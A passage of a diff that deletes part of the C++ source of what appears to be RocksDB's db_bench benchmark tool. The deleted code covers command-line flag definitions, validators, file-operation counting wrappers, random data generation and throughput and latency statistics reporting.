-DEFINE_int32(min_level_to_compress, -1, "If non-negative, compression starts"
-             " from this level. Levels with number < min_level_to_compress are"
-             " not compressed. Otherwise, apply compression_type to "
-             "all levels.");
-
-static bool ValidateTableCacheNumshardbits(const char* flagname,
-                                           int32_t value) {
-  if (0 >= value || value > 20) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be  0 < val <= 20\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(table_cache_numshardbits, 4, "");
-
-#ifndef ROCKSDB_LITE
-DEFINE_string(env_uri, "", "URI for registry Env lookup. Mutually exclusive"
-              " with --hdfs.");
-#endif  // ROCKSDB_LITE
-DEFINE_string(hdfs, "", "Name of hdfs environment. Mutually exclusive with"
-              " --env_uri.");
-static rocksdb::Env* FLAGS_env = rocksdb::Env::Default();
-
-DEFINE_int64(stats_interval, 0, "Stats are reported every N operations when "
-             "this is greater than zero. When 0 the interval grows over time.");
-
-DEFINE_int64(stats_interval_seconds, 0, "Report stats every N seconds. This "
-             "overrides stats_interval when both are > 0.");
-
-DEFINE_int32(stats_per_interval, 0, "Reports additional stats per interval when"
-             " this is greater than 0.");
-
-DEFINE_int64(report_interval_seconds, 0,
-             "If greater than zero, it will write simple stats in CVS format "
-             "to --report_file every N seconds");
-
-DEFINE_string(report_file, "report.csv",
-              "Filename where some simple stats are reported to (if "
-              "--report_interval_seconds is bigger than 0)");
-
-DEFINE_int32(thread_status_per_interval, 0,
-             "Takes and report a snapshot of the current status of each thread"
-             " when this is greater than 0.");
-
-DEFINE_int32(perf_level, rocksdb::PerfLevel::kDisable, "Level of perf collection");
-
-static bool ValidateRateLimit(const char* flagname, double value) {
-  const double EPSILON = 1e-10;
-  if ( value < -EPSILON ) {
-    fprintf(stderr, "Invalid value for --%s: %12.6f, must be >= 0.0\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_double(soft_rate_limit, 0.0, "DEPRECATED");
-
-DEFINE_double(hard_rate_limit, 0.0, "DEPRECATED");
-
-DEFINE_uint64(soft_pending_compaction_bytes_limit, 64ull * 1024 * 1024 * 1024,
-              "Slowdown writes if pending compaction bytes exceed this number");
-
-DEFINE_uint64(hard_pending_compaction_bytes_limit, 128ull * 1024 * 1024 * 1024,
-              "Stop writes if pending compaction bytes exceed this number");
-
-DEFINE_uint64(delayed_write_rate, 8388608u,
-              "Limited bytes allowed to DB when soft_rate_limit or "
-              "level0_slowdown_writes_trigger triggers");
-
-DEFINE_bool(enable_pipelined_write, true,
-            "Allow WAL and memtable writes to be pipelined");
-
-DEFINE_bool(allow_concurrent_memtable_write, true,
-            "Allow multi-writers to update mem tables in parallel.");
-
-DEFINE_bool(enable_write_thread_adaptive_yield, true,
-            "Use a yielding spin loop for brief writer thread waits.");
-
-DEFINE_uint64(
-    write_thread_max_yield_usec, 100,
-    "Maximum microseconds for enable_write_thread_adaptive_yield operation.");
-
-DEFINE_uint64(write_thread_slow_yield_usec, 3,
-              "The threshold at which a slow yield is considered a signal that "
-              "other processes or threads want the core.");
-
-DEFINE_int32(rate_limit_delay_max_milliseconds, 1000,
-             "When hard_rate_limit is set then this is the max time a put will"
-             " be stalled.");
-
-DEFINE_uint64(rate_limiter_bytes_per_sec, 0, "Set options.rate_limiter value.");
-
-DEFINE_bool(rate_limit_bg_reads, false,
-            "Use options.rate_limiter on compaction reads");
-
-DEFINE_uint64(
-    benchmark_write_rate_limit, 0,
-    "If non-zero, db_bench will rate-limit the writes going into RocksDB. This "
-    "is the global rate in bytes/second.");
-
-DEFINE_uint64(
-    benchmark_read_rate_limit, 0,
-    "If non-zero, db_bench will rate-limit the reads from RocksDB. This "
-    "is the global rate in ops/second.");
-
-DEFINE_uint64(max_compaction_bytes, rocksdb::Options().max_compaction_bytes,
-              "Max bytes allowed in one compaction");
-
-#ifndef ROCKSDB_LITE
-DEFINE_bool(readonly, false, "Run read only benchmarks.");
-#endif  // ROCKSDB_LITE
-
-DEFINE_bool(disable_auto_compactions, false, "Do not auto trigger compactions");
-
-DEFINE_uint64(wal_ttl_seconds, 0, "Set the TTL for the WAL Files in seconds.");
-DEFINE_uint64(wal_size_limit_MB, 0, "Set the size limit for the WAL Files"
-              " in MB.");
-DEFINE_uint64(max_total_wal_size, 0, "Set total max WAL size");
-
-DEFINE_bool(mmap_read, rocksdb::Options().allow_mmap_reads,
-            "Allow reads to occur via mmap-ing files");
-
-DEFINE_bool(mmap_write, rocksdb::Options().allow_mmap_writes,
-            "Allow writes to occur via mmap-ing files");
-
-DEFINE_bool(use_direct_reads, rocksdb::Options().use_direct_reads,
-            "Use O_DIRECT for reading data");
-
-DEFINE_bool(use_direct_io_for_flush_and_compaction,
-            rocksdb::Options().use_direct_io_for_flush_and_compaction,
-            "Use O_DIRECT for background flush and compaction I/O");
-
-DEFINE_bool(advise_random_on_open, rocksdb::Options().advise_random_on_open,
-            "Advise random access on table file open");
-
-DEFINE_string(compaction_fadvice, "NORMAL",
-              "Access pattern advice when a file is compacted");
-static auto FLAGS_compaction_fadvice_e =
-  rocksdb::Options().access_hint_on_compaction_start;
-
-DEFINE_bool(use_tailing_iterator, false,
-            "Use tailing iterator to access a series of keys instead of get");
-
-DEFINE_bool(use_adaptive_mutex, rocksdb::Options().use_adaptive_mutex,
-            "Use adaptive mutex");
-
-DEFINE_uint64(bytes_per_sync,  rocksdb::Options().bytes_per_sync,
-              "Allows OS to incrementally sync SST files to disk while they are"
-              " being written, in the background. Issue one request for every"
-              " bytes_per_sync written. 0 turns it off.");
-
-DEFINE_uint64(wal_bytes_per_sync,  rocksdb::Options().wal_bytes_per_sync,
-              "Allows OS to incrementally sync WAL files to disk while they are"
-              " being written, in the background. Issue one request for every"
-              " wal_bytes_per_sync written. 0 turns it off.");
-
-DEFINE_bool(use_single_deletes, true,
-            "Use single deletes (used in RandomReplaceKeys only).");
-
-DEFINE_double(stddev, 2000.0,
-              "Standard deviation of normal distribution used for picking keys"
-              " (used in RandomReplaceKeys only).");
-
-DEFINE_int32(key_id_range, 100000,
-             "Range of possible value of key id (used in TimeSeries only).");
-
-DEFINE_string(expire_style, "none",
-              "Style to remove expired time entries. Can be one of the options "
-              "below: none (do not expired data), compaction_filter (use a "
-              "compaction filter to remove expired data), delete (seek IDs and "
-              "remove expired data) (used in TimeSeries only).");
-
-DEFINE_uint64(
-    time_range, 100000,
-    "Range of timestamp that store in the database (used in TimeSeries"
-    " only).");
-
-DEFINE_int32(num_deletion_threads, 1,
-             "Number of threads to do deletion (used in TimeSeries and delete "
-             "expire_style only).");
-
-DEFINE_int32(max_successive_merges, 0, "Maximum number of successive merge"
-             " operations on a key in the memtable");
-
-static bool ValidatePrefixSize(const char* flagname, int32_t value) {
-  if (value < 0 || value>=2000000000) {
-    fprintf(stderr, "Invalid value for --%s: %d. 0<= PrefixSize <=2000000000\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(prefix_size, 0, "control the prefix size for HashSkipList and "
-             "plain table");
-DEFINE_int64(keys_per_prefix, 0, "control average number of keys generated "
-             "per prefix, 0 means no special handling of the prefix, "
-             "i.e. use the prefix comes with the generated random number.");
-DEFINE_int32(memtable_insert_with_hint_prefix_size, 0,
-             "If non-zero, enable "
-             "memtable insert with hint with the given prefix size.");
-DEFINE_bool(enable_io_prio, false, "Lower the background flush/compaction "
-            "threads' IO priority");
-DEFINE_bool(identity_as_first_hash, false, "the first hash function of cuckoo "
-            "table becomes an identity function. This is only valid when key "
-            "is 8 bytes");
-DEFINE_bool(dump_malloc_stats, true, "Dump malloc stats in LOG ");
-
-enum RepFactory {
-  kSkipList,
-  kPrefixHash,
-  kVectorRep,
-  kHashLinkedList,
-  kCuckoo
-};
-
-static enum RepFactory StringToRepFactory(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "skip_list"))
-    return kSkipList;
-  else if (!strcasecmp(ctype, "prefix_hash"))
-    return kPrefixHash;
-  else if (!strcasecmp(ctype, "vector"))
-    return kVectorRep;
-  else if (!strcasecmp(ctype, "hash_linkedlist"))
-    return kHashLinkedList;
-  else if (!strcasecmp(ctype, "cuckoo"))
-    return kCuckoo;
-
-  fprintf(stdout, "Cannot parse memreptable %s\n", ctype);
-  return kSkipList;
-}
-
-static enum RepFactory FLAGS_rep_factory;
-DEFINE_string(memtablerep, "skip_list", "");
-DEFINE_int64(hash_bucket_count, 1024 * 1024, "hash bucket count");
-DEFINE_bool(use_plain_table, false, "if use plain table "
-            "instead of block-based table format");
-DEFINE_bool(use_cuckoo_table, false, "if use cuckoo table format");
-DEFINE_double(cuckoo_hash_ratio, 0.9, "Hash ratio for Cuckoo SST table.");
-DEFINE_bool(use_hash_search, false, "if use kHashSearch "
-            "instead of kBinarySearch. "
-            "This is valid if only we use BlockTable");
-DEFINE_bool(use_block_based_filter, false, "if use kBlockBasedFilter "
-            "instead of kFullFilter for filter block. "
-            "This is valid if only we use BlockTable");
-DEFINE_string(merge_operator, "", "The merge operator to use with the database."
-              "If a new merge operator is specified, be sure to use fresh"
-              " database The possible merge operators are defined in"
-              " utilities/merge_operators.h");
-DEFINE_int32(skip_list_lookahead, 0, "Used with skip_list memtablerep; try "
-             "linear search first for this many steps from the previous "
-             "position");
-DEFINE_bool(report_file_operations, false, "if report number of file "
-            "operations");
-
-static const bool FLAGS_soft_rate_limit_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_soft_rate_limit, &ValidateRateLimit);
-
-static const bool FLAGS_hard_rate_limit_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_hard_rate_limit, &ValidateRateLimit);
-
-static const bool FLAGS_prefix_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefix_size, &ValidatePrefixSize);
-
-static const bool FLAGS_key_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_key_size, &ValidateKeySize);
-
-static const bool FLAGS_cache_numshardbits_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_cache_numshardbits,
-                          &ValidateCacheNumshardbits);
-
-static const bool FLAGS_readwritepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_readwritepercent, &ValidateInt32Percent);
-
-DEFINE_int32(disable_seek_compaction, false,
-             "Not used, left here for backwards compatibility");
-
-static const bool FLAGS_deletepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_deletepercent, &ValidateInt32Percent);
-static const bool FLAGS_table_cache_numshardbits_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_table_cache_numshardbits,
-                          &ValidateTableCacheNumshardbits);
-
-namespace rocksdb {
-
-namespace {
-struct ReportFileOpCounters {
-  std::atomic<int> open_counter_;
-  std::atomic<int> read_counter_;
-  std::atomic<int> append_counter_;
-  std::atomic<uint64_t> bytes_read_;
-  std::atomic<uint64_t> bytes_written_;
-};
-
-// A special Env to records and report file operations in db_bench
-class ReportFileOpEnv : public EnvWrapper {
- public:
-  explicit ReportFileOpEnv(Env* base) : EnvWrapper(base) { reset(); }
-
-  void reset() {
-    counters_.open_counter_ = 0;
-    counters_.read_counter_ = 0;
-    counters_.append_counter_ = 0;
-    counters_.bytes_read_ = 0;
-    counters_.bytes_written_ = 0;
-  }
-
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& soptions) override {
-    class CountingFile : public SequentialFile {
-     private:
-      unique_ptr<SequentialFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<SequentialFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-
-      virtual Status Read(size_t n, Slice* result, char* scratch) override {
-        counters_->read_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Read(n, result, scratch);
-        counters_->bytes_read_.fetch_add(result->size(),
-                                         std::memory_order_relaxed);
-        return rv;
-      }
-
-      virtual Status Skip(uint64_t n) override { return target_->Skip(n); }
-    };
-
-    Status s = target()->NewSequentialFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& soptions) override {
-    class CountingFile : public RandomAccessFile {
-     private:
-      unique_ptr<RandomAccessFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<RandomAccessFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-      virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                          char* scratch) const override {
-        counters_->read_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Read(offset, n, result, scratch);
-        counters_->bytes_read_.fetch_add(result->size(),
-                                         std::memory_order_relaxed);
-        return rv;
-      }
-    };
-
-    Status s = target()->NewRandomAccessFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    class CountingFile : public WritableFile {
-     private:
-      unique_ptr<WritableFile> target_;
-      ReportFileOpCounters* counters_;
-
-     public:
-      CountingFile(unique_ptr<WritableFile>&& target,
-                   ReportFileOpCounters* counters)
-          : target_(std::move(target)), counters_(counters) {}
-
-      Status Append(const Slice& data) override {
-        counters_->append_counter_.fetch_add(1, std::memory_order_relaxed);
-        Status rv = target_->Append(data);
-        counters_->bytes_written_.fetch_add(data.size(),
-                                            std::memory_order_relaxed);
-        return rv;
-      }
-
-      Status Truncate(uint64_t size) override { return target_->Truncate(size); }
-      Status Close() override { return target_->Close(); }
-      Status Flush() override { return target_->Flush(); }
-      Status Sync() override { return target_->Sync(); }
-    };
-
-    Status s = target()->NewWritableFile(f, r, soptions);
-    if (s.ok()) {
-      counters()->open_counter_.fetch_add(1, std::memory_order_relaxed);
-      r->reset(new CountingFile(std::move(*r), counters()));
-    }
-    return s;
-  }
-
-  // getter
-  ReportFileOpCounters* counters() { return &counters_; }
-
- private:
-  ReportFileOpCounters counters_;
-};
-
-}  // namespace
-
-// Helper for quickly generating random data.
-class RandomGenerator {
- private:
-  std::string data_;
-  unsigned int pos_;
-
- public:
-  RandomGenerator() {
-    // We use a limited amount of data over and over again and ensure
-    // that it is larger than the compression window (32KB), and also
-    // large enough to serve all typical value sizes we want to write.
-    Random rnd(301);
-    std::string piece;
-    while (data_.size() < (unsigned)std::max(1048576, FLAGS_value_size)) {
-      // Add a short fragment that is as compressible as specified
-      // by FLAGS_compression_ratio.
-      test::CompressibleString(&rnd, FLAGS_compression_ratio, 100, &piece);
-      data_.append(piece);
-    }
-    pos_ = 0;
-  }
-
-  Slice Generate(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-
-  Slice GenerateWithTTL(unsigned int len) {
-    assert(len <= data_.size());
-    if (pos_ + len > data_.size()) {
-      pos_ = 0;
-    }
-    pos_ += len;
-    return Slice(data_.data() + pos_ - len, len);
-  }
-};
-
-static void AppendWithSpace(std::string* str, Slice msg) {
-  if (msg.empty()) return;
-  if (!str->empty()) {
-    str->push_back(' ');
-  }
-  str->append(msg.data(), msg.size());
-}
-
-struct DBWithColumnFamilies {
-  std::vector<ColumnFamilyHandle*> cfh;
-  DB* db;
-#ifndef ROCKSDB_LITE
-  OptimisticTransactionDB* opt_txn_db;
-#endif  // ROCKSDB_LITE
-  std::atomic<size_t> num_created;  // Need to be updated after all the
-                                    // new entries in cfh are set.
-  size_t num_hot;  // Number of column families to be queried at each moment.
-                   // After each CreateNewCf(), another num_hot number of new
-                   // Column families will be created and used to be queried.
-  port::Mutex create_cf_mutex;  // Only one thread can execute CreateNewCf()
-  std::vector<int> cfh_idx_to_prob;  // ith index holds probability of operating
-                                     // on cfh[i].
-
-  DBWithColumnFamilies()
-      : db(nullptr)
-#ifndef ROCKSDB_LITE
-        , opt_txn_db(nullptr)
-#endif  // ROCKSDB_LITE
-  {
-    cfh.clear();
-    num_created = 0;
-    num_hot = 0;
-  }
-
-  DBWithColumnFamilies(const DBWithColumnFamilies& other)
-      : cfh(other.cfh),
-        db(other.db),
-#ifndef ROCKSDB_LITE
-        opt_txn_db(other.opt_txn_db),
-#endif  // ROCKSDB_LITE
-        num_created(other.num_created.load()),
-        num_hot(other.num_hot),
-        cfh_idx_to_prob(other.cfh_idx_to_prob) {
-  }
-
-  void DeleteDBs() {
-    std::for_each(cfh.begin(), cfh.end(),
-                  [](ColumnFamilyHandle* cfhi) { delete cfhi; });
-    cfh.clear();
-#ifndef ROCKSDB_LITE
-    if (opt_txn_db) {
-      delete opt_txn_db;
-      opt_txn_db = nullptr;
-    } else {
-      delete db;
-      db = nullptr;
-    }
-#else
-    delete db;
-    db = nullptr;
-#endif  // ROCKSDB_LITE
-  }
-
-  ColumnFamilyHandle* GetCfh(int64_t rand_num) {
-    assert(num_hot > 0);
-    size_t rand_offset = 0;
-    if (!cfh_idx_to_prob.empty()) {
-      assert(cfh_idx_to_prob.size() == num_hot);
-      int sum = 0;
-      while (sum + cfh_idx_to_prob[rand_offset] < rand_num % 100) {
-        sum += cfh_idx_to_prob[rand_offset];
-        ++rand_offset;
-      }
-      assert(rand_offset < cfh_idx_to_prob.size());
-    } else {
-      rand_offset = rand_num % num_hot;
-    }
-    return cfh[num_created.load(std::memory_order_acquire) - num_hot +
-               rand_offset];
-  }
-
-  // stage: assume CF from 0 to stage * num_hot has be created. Need to create
-  //        stage * num_hot + 1 to stage * (num_hot + 1).
-  void CreateNewCf(ColumnFamilyOptions options, int64_t stage) {
-    MutexLock l(&create_cf_mutex);
-    if ((stage + 1) * num_hot <= num_created) {
-      // Already created.
-      return;
-    }
-    auto new_num_created = num_created + num_hot;
-    assert(new_num_created <= cfh.size());
-    for (size_t i = num_created; i < new_num_created; i++) {
-      Status s =
-          db->CreateColumnFamily(options, ColumnFamilyName(i), &(cfh[i]));
-      if (!s.ok()) {
-        fprintf(stderr, "create column family error: %s\n",
-                s.ToString().c_str());
-        abort();
-      }
-    }
-    num_created.store(new_num_created, std::memory_order_release);
-  }
-};
-
-// a class that reports stats to CSV file
-class ReporterAgent {
- public:
-  ReporterAgent(Env* env, const std::string& fname,
-                uint64_t report_interval_secs)
-      : env_(env),
-        total_ops_done_(0),
-        last_report_(0),
-        report_interval_secs_(report_interval_secs),
-        stop_(false) {
-    auto s = env_->NewWritableFile(fname, &report_file_, EnvOptions());
-    if (s.ok()) {
-      s = report_file_->Append(Header() + "\n");
-    }
-    if (s.ok()) {
-      s = report_file_->Flush();
-    }
-    if (!s.ok()) {
-      fprintf(stderr, "Can't open %s: %s\n", fname.c_str(),
-              s.ToString().c_str());
-      abort();
-    }
-
-    reporting_thread_ = port::Thread([&]() { SleepAndReport(); });
-  }
-
-  ~ReporterAgent() {
-    {
-      std::unique_lock<std::mutex> lk(mutex_);
-      stop_ = true;
-      stop_cv_.notify_all();
-    }
-    reporting_thread_.join();
-  }
-
-  // thread safe
-  void ReportFinishedOps(int64_t num_ops) {
-    total_ops_done_.fetch_add(num_ops);
-  }
-
- private:
-  std::string Header() const { return "secs_elapsed,interval_qps"; }
-  void SleepAndReport() {
-    uint64_t kMicrosInSecond = 1000 * 1000;
-    auto time_started = env_->NowMicros();
-    while (true) {
-      {
-        std::unique_lock<std::mutex> lk(mutex_);
-        if (stop_ ||
-            stop_cv_.wait_for(lk, std::chrono::seconds(report_interval_secs_),
-                              [&]() { return stop_; })) {
-          // stopping
-          break;
-        }
-        // else -> timeout, which means time for a report!
-      }
-      auto total_ops_done_snapshot = total_ops_done_.load();
-      // round the seconds elapsed
-      auto secs_elapsed =
-          (env_->NowMicros() - time_started + kMicrosInSecond / 2) /
-          kMicrosInSecond;
-      std::string report = ToString(secs_elapsed) + "," +
-                           ToString(total_ops_done_snapshot - last_report_) +
-                           "\n";
-      auto s = report_file_->Append(report);
-      if (s.ok()) {
-        s = report_file_->Flush();
-      }
-      if (!s.ok()) {
-        fprintf(stderr,
-                "Can't write to report file (%s), stopping the reporting\n",
-                s.ToString().c_str());
-        break;
-      }
-      last_report_ = total_ops_done_snapshot;
-    }
-  }
-
-  Env* env_;
-  std::unique_ptr<WritableFile> report_file_;
-  std::atomic<int64_t> total_ops_done_;
-  int64_t last_report_;
-  const uint64_t report_interval_secs_;
-  rocksdb::port::Thread reporting_thread_;
-  std::mutex mutex_;
-  // will notify on stop
-  std::condition_variable stop_cv_;
-  bool stop_;
-};
-
-enum OperationType : unsigned char {
-  kRead = 0,
-  kWrite,
-  kDelete,
-  kSeek,
-  kMerge,
-  kUpdate,
-  kCompress,
-  kUncompress,
-  kCrc,
-  kHash,
-  kOthers
-};
-
-static std::unordered_map<OperationType, std::string, std::hash<unsigned char>>
-                          OperationTypeString = {
-  {kRead, "read"},
-  {kWrite, "write"},
-  {kDelete, "delete"},
-  {kSeek, "seek"},
-  {kMerge, "merge"},
-  {kUpdate, "update"},
-  {kCompress, "compress"},
-  {kCompress, "uncompress"},
-  {kCrc, "crc"},
-  {kHash, "hash"},
-  {kOthers, "op"}
-};
-
-class CombinedStats;
-class Stats {
- private:
-  int id_;
-  uint64_t start_;
-  uint64_t finish_;
-  double seconds_;
-  uint64_t done_;
-  uint64_t last_report_done_;
-  uint64_t next_report_;
-  uint64_t bytes_;
-  uint64_t last_op_finish_;
-  uint64_t last_report_finish_;
-  std::unordered_map<OperationType, std::shared_ptr<HistogramImpl>,
-                     std::hash<unsigned char>> hist_;
-  std::string message_;
-  bool exclude_from_merge_;
-  ReporterAgent* reporter_agent_;  // does not own
-  friend class CombinedStats;
-
- public:
-  Stats() { Start(-1); }
-
-  void SetReporterAgent(ReporterAgent* reporter_agent) {
-    reporter_agent_ = reporter_agent;
-  }
-
-  void Start(int id) {
-    id_ = id;
-    next_report_ = FLAGS_stats_interval ? FLAGS_stats_interval : 100;
-    last_op_finish_ = start_;
-    hist_.clear();
-    done_ = 0;
-    last_report_done_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    start_ = FLAGS_env->NowMicros();
-    finish_ = start_;
-    last_report_finish_ = start_;
-    message_.clear();
-    // When set, stats from this thread won't be merged with others.
-    exclude_from_merge_ = false;
-  }
-
-  void Merge(const Stats& other) {
-    if (other.exclude_from_merge_)
-      return;
-
-    for (auto it = other.hist_.begin(); it != other.hist_.end(); ++it) {
-      auto this_it = hist_.find(it->first);
-      if (this_it != hist_.end()) {
-        this_it->second->Merge(*(other.hist_.at(it->first)));
-      } else {
-        hist_.insert({ it->first, it->second });
-      }
-    }
-
-    done_ += other.done_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-
-    // Just keep the messages from one thread
-    if (message_.empty()) message_ = other.message_;
-  }
-
-  void Stop() {
-    finish_ = FLAGS_env->NowMicros();
-    seconds_ = (finish_ - start_) * 1e-6;
-  }
-
-  void AddMessage(Slice msg) {
-    AppendWithSpace(&message_, msg);
-  }
-
-  void SetId(int id) { id_ = id; }
-  void SetExcludeFromMerge() { exclude_from_merge_ = true; }
-
-  void PrintThreadStatus() {
-    std::vector<ThreadStatus> thread_list;
-    FLAGS_env->GetThreadList(&thread_list);
-
-    fprintf(stderr, "\n%18s %10s %12s %20s %13s %45s %12s %s\n",
-        "ThreadID", "ThreadType", "cfName", "Operation",
-        "ElapsedTime", "Stage", "State", "OperationProperties");
-
-    int64_t current_time = 0;
-    Env::Default()->GetCurrentTime(&current_time);
-    for (auto ts : thread_list) {
-      fprintf(stderr, "%18" PRIu64 " %10s %12s %20s %13s %45s %12s",
-          ts.thread_id,
-          ThreadStatus::GetThreadTypeName(ts.thread_type).c_str(),
-          ts.cf_name.c_str(),
-          ThreadStatus::GetOperationName(ts.operation_type).c_str(),
-          ThreadStatus::MicrosToString(ts.op_elapsed_micros).c_str(),
-          ThreadStatus::GetOperationStageName(ts.operation_stage).c_str(),
-          ThreadStatus::GetStateName(ts.state_type).c_str());
-
-      auto op_properties = ThreadStatus::InterpretOperationProperties(
-          ts.operation_type, ts.op_properties);
-      for (const auto& op_prop : op_properties) {
-        fprintf(stderr, " %s %" PRIu64" |",
-            op_prop.first.c_str(), op_prop.second);
-      }
-      fprintf(stderr, "\n");
-    }
-  }
-
-  void ResetLastOpTime() {
-    // Set to now to avoid latency from calls to SleepForMicroseconds
-    last_op_finish_ = FLAGS_env->NowMicros();
-  }
-
-  void FinishedOps(DBWithColumnFamilies* db_with_cfh, DB* db, int64_t num_ops,
-                   enum OperationType op_type = kOthers) {
-    if (reporter_agent_) {
-      reporter_agent_->ReportFinishedOps(num_ops);
-    }
-    if (FLAGS_histogram) {
-      uint64_t now = FLAGS_env->NowMicros();
-      uint64_t micros = now - last_op_finish_;
-
-      if (hist_.find(op_type) == hist_.end())
-      {
-        auto hist_temp = std::make_shared<HistogramImpl>();
-        hist_.insert({op_type, std::move(hist_temp)});
-      }
-      hist_[op_type]->Add(micros);
-
-      if (micros > 20000 && !FLAGS_stats_interval) {
-        fprintf(stderr, "long op: %" PRIu64 " micros%30s\r", micros, "");
-        fflush(stderr);
-      }
-      last_op_finish_ = now;
-    }
-
-    done_ += num_ops;
-    if (done_ >= next_report_) {
-      if (!FLAGS_stats_interval) {
-        if      (next_report_ < 1000)   next_report_ += 100;
-        else if (next_report_ < 5000)   next_report_ += 500;
-        else if (next_report_ < 10000)  next_report_ += 1000;
-        else if (next_report_ < 50000)  next_report_ += 5000;
-        else if (next_report_ < 100000) next_report_ += 10000;
-        else if (next_report_ < 500000) next_report_ += 50000;
-        else                            next_report_ += 100000;
-        fprintf(stderr, "... finished %" PRIu64 " ops%30s\r", done_, "");
-      } else {
-        uint64_t now = FLAGS_env->NowMicros();
-        int64_t usecs_since_last = now - last_report_finish_;
-
-        // Determine whether to print status where interval is either
-        // each N operations or each N seconds.
-
-        if (FLAGS_stats_interval_seconds &&
-            usecs_since_last < (FLAGS_stats_interval_seconds * 1000000)) {
-          // Don't check again for this many operations
-          next_report_ += FLAGS_stats_interval;
-
-        } else {
-
-          fprintf(stderr,
-                  "%s ... thread %d: (%" PRIu64 ",%" PRIu64 ") ops and "
-                  "(%.1f,%.1f) ops/second in (%.6f,%.6f) seconds\n",
-                  FLAGS_env->TimeToString(now/1000000).c_str(),
-                  id_,
-                  done_ - last_report_done_, done_,
-                  (done_ - last_report_done_) /
-                  (usecs_since_last / 1000000.0),
-                  done_ / ((now - start_) / 1000000.0),
-                  (now - last_report_finish_) / 1000000.0,
-                  (now - start_) / 1000000.0);
-
-          if (id_ == 0 && FLAGS_stats_per_interval) {
-            std::string stats;
-
-            if (db_with_cfh && db_with_cfh->num_created.load()) {
-              for (size_t i = 0; i < db_with_cfh->num_created.load(); ++i) {
-                if (db->GetProperty(db_with_cfh->cfh[i], "rocksdb.cfstats",
-                                    &stats))
-                  fprintf(stderr, "%s\n", stats.c_str());
-                if (FLAGS_show_table_properties) {
-                  for (int level = 0; level < FLAGS_num_levels; ++level) {
-                    if (db->GetProperty(
-                            db_with_cfh->cfh[i],
-                            "rocksdb.aggregated-table-properties-at-level" +
-                                ToString(level),
-                            &stats)) {
-                      if (stats.find("# entries=0") == std::string::npos) {
-                        fprintf(stderr, "Level[%d]: %s\n", level,
-                                stats.c_str());
-                      }
-                    }
-                  }
-                }
-              }
-            } else if (db) {
-              if (db->GetProperty("rocksdb.stats", &stats)) {
-                fprintf(stderr, "%s\n", stats.c_str());
-              }
-              if (FLAGS_show_table_properties) {
-                for (int level = 0; level < FLAGS_num_levels; ++level) {
-                  if (db->GetProperty(
-                          "rocksdb.aggregated-table-properties-at-level" +
-                              ToString(level),
-                          &stats)) {
-                    if (stats.find("# entries=0") == std::string::npos) {
-                      fprintf(stderr, "Level[%d]: %s\n", level, stats.c_str());
-                    }
-                  }
-                }
-              }
-            }
-          }
-
-          next_report_ += FLAGS_stats_interval;
-          last_report_finish_ = now;
-          last_report_done_ = done_;
-        }
-      }
-      if (id_ == 0 && FLAGS_thread_status_per_interval) {
-        PrintThreadStatus();
-      }
-      fflush(stderr);
-    }
-  }
-
-  void AddBytes(int64_t n) {
-    bytes_ += n;
-  }
-
-  void Report(const Slice& name) {
-    // Pretend at least one op was done in case we are running a benchmark
-    // that does not call FinishedOps().
-    if (done_ < 1) done_ = 1;
-
-    std::string extra;
-    if (bytes_ > 0) {
-      // Rate is computed on actual elapsed time, not the sum of per-thread
-      // elapsed times.
-      double elapsed = (finish_ - start_) * 1e-6;
-      char rate[100];
-      snprintf(rate, sizeof(rate), "%6.1f MB/s",
-               (bytes_ / 1048576.0) / elapsed);
-      extra = rate;
-    }
-    AppendWithSpace(&extra, message_);
-    double elapsed = (finish_ - start_) * 1e-6;
-    double throughput = (double)done_/elapsed;
-
-    fprintf(stdout, "%-12s : %11.3f micros/op %ld ops/sec;%s%s\n",
-            name.ToString().c_str(),
-            elapsed * 1e6 / done_,
-            (long)throughput,
-            (extra.empty() ? "" : " "),
-            extra.c_str());
-    if (FLAGS_histogram) {
-      for (auto it = hist_.begin(); it != hist_.end(); ++it) {
-        fprintf(stdout, "Microseconds per %s:\n%s\n",
-                OperationTypeString[it->first].c_str(),
-                it->second->ToString().c_str());
-      }
-    }
-    if (FLAGS_report_file_operations) {
-      ReportFileOpEnv* env = static_cast<ReportFileOpEnv*>(FLAGS_env);
